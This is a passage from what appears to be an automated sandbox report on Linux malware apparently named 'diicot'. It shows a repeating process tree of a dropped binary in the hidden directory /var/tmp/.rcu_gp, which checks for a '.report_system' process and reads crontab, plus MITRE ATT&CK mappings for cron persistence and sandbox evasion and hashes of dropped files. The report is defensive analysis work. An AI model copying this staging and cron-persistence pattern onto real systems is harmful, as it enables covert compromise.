  2⤵
  PID:2578
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2579
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    PID:2580
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2581
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2582
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2583
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2584
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2585
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2586
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2587
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2588
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2589
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2590
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2591
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2592
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2593
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2594
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2595
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2596
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2597
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:2598
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2599
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2600
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2601
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2602
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2603
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:2604
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2605
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2606
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2607
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2608
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2609
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2610
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2611
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2612
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2613
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2614
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2615
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2616
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2617
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2618
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2619
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2620
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2621
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2622
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2623
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2624
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2625
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2626
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2627
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2628
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2629
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2630
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2631
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2632
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2633
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2634
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2635
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2636
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2637
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2638
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2639
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2640
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2641
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2642
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2643
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2644
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2645
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2646
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2647
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2648
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2649
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2650
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2651
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:2652
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2653
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2654
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2655
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2656
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2657
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2658
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2659
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2660
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2661
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2662
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2663
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2664
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2665
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2666
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2667
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2668
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2669
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2670
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2671
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2672
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2673
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2674
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2675
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:2676
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2677
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2678
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2679
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2680
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2681
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:2682
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2683
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2684
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2685
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2686
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2687
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    PID:2688
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2689
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2690
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2691
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2692
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2693
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2694
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2695
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2696
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2697
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2698
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2699
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2700
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2701
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2702
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2703
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2704
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2705
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:2706
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2707
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2708
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2709
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2710
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2711
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2712
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2713
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2714
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2715
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2716
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2717
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2718
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2719
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2720
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2721
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2722
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2723
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2724
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2725
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2726
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2727
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2728
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2729
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2730
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2732
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2731
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2733
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2734
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2735
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    PID:2736
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2737
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2738
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2739
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2740
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2741
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:2742
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2743
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2744
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2745
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2746
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2747
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:2748
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2749
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2750
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2751
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2752
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2753
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2754
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2756
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2755
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2757
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2758
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2759
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2760
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2761
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2762
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2763
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2779
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2780
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:2781
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2782
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2783
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2784
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2785
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2786
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2787
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2788
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2789
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2790
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2791
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2792
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2793
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2794
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2795
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2796
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2797
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2798
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    PID:2799
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2800
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2801
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2802
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2806
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2807
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2808
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2809
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2810
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2811
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2812
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2813
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    PID:2814
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2815
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2816
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2817
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2818
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2819
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:2820
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2821
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2822
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2823
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2824
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2825
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:2826
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2827
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2828
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2829
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2830
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2831
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    PID:2832
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2833
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2834
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2835
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2836
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2837
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:2838
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2839
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2840
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2841
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2842
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2843
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2844
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2845
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2846

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/var/spool/cron/crontabs/tmp.bKFdNi

Filesize
317B

MD5
f728459fd6c7817aa43fda78c3de4609

SHA1
7855d1871a3548214badc17f303dbd63964ed6d9

SHA256
9196c36d20761d062a99325c60aa873e236040d8809d70422ed224d59966b6a8

SHA512
05c3bda8cea29f8af780289784704fd97bf99a43f7914b2126e9a44ed87f618e23a8d6052bf3c9d232a90bbd931e9c2a97d01767c5d579b503d64d3506fff9d6

Download Submit
/var/tmp/.rcu_gp/.ps4

Filesize
17B

MD5
ed41f347e368587902ee39ae0820e4f3

SHA1
55fc93606d1c801650fb68c85b4535658f44e51b

SHA256
fadf3c99404046418d249eca29c985b40bf34d6bb6000f32bb73f39e0d6e5016

SHA512
5ccd1805d59b3d114eeaaee5a422d4d37c9e7c0629ecfe43111b9c1512c3dbb649fc97e50c4c6d74ac05a0c34b4b53e4924a0dbf4decec83c1db7faed890a607

Download Submit
/var/tmp/.rcu_gp/.ps5

Filesize
31B

MD5
3849d2e2d4fbd74bf13c86237e5f8257

SHA1
1a1d605574d84531c36967e62c50387af56ec048

SHA256
5a91635ed578ff1552d71f49009f5d507273b42d926960b44d952bf659c4b64e

SHA512
06ee5e3db69f1cff254e46e77d6e10ab92729e3fb9dc7f961fc438d98d3fdb00a86b76e05c79215b3a7e4f25ba821285edb1ff8a8a8a76cc9f38b501891d9497

Download Submit
/var/tmp/.rcu_gp/.ps5

Filesize
76B

MD5
268448409cd2df039233e116f5ff4cfd

SHA1
6df0a74b2cef2974dbd8422b027a29a40a5f9ad8

SHA256
00293284adf5483c18ab9f69f92f52fb35568bab00ee7e4f70a490e779ddc3e8

SHA512
774b981b5c388924868f10a61d1e7bc2a4207acef8bd02134d675e2197dd6590ab643201db9d1e5e700fa5d3b83a0f1d53d69c216c3b17dec5c4aec90799609c

Download Submit
/var/tmp/.rcu_gp/.ps5

Filesize
122B

MD5
fc16ad6d39c8c6669ea14e35610d398b

SHA1
0644c85527d59857d780c26d9db9c585066a9f1a

SHA256
d1e064e763215d12123c8711c37a070a6ba95c9458c0f980a308ffbd00863493

SHA512
f219d7a9f1b7c35a1e4be974a62fd7a566c209f8261e06183cf9375925185c0d2e286df2f76fcec941c370738622bd592d1f398b852dda43dafd90d0bb64fe70

Download Submit
/var/tmp/.rcu_gp/.report_system

Filesize
8.4MB

MD5
1271e6e82b344df1c7960230ec449af7

SHA1
7fe3253d34cae21facc8c445c3620b9e8566988b

SHA256
fff96ad553f916da4eb0d55b1075b9b4aea7b93249663aefbc0310e53c7498ba

SHA512
786f8ae08f8cdb892c1d67b216d26ce8db464e445c4884ab23bdfb642d7cc52862ceb77c51b38a2f77c6ae38541ea83f6eaeb2d2c2337a2d96f61738de4ff39c

Download Submit
/var/tmp/.rcu_gp/diicot

Filesize
137B

MD5
8bbab4cb0d4871bf7665cbbe5c7dd305

SHA1
6358fc05a9ca981197dae3cc35c1f49cc61868ec

SHA256
dbeb0bb0eed71abae7cabeec6e3cbda15e1883fb95e7c68c644fdf7eb4b23723

SHA512
8fe9b04e9d71c752bb356f78b4e4e1e704ca89248574817094c4b4404c27f6ba47f870158c449ff1d2a2ec4ebb7c31a8b2857ce15ae7db042a3b4e0f10776cd9

Download Submit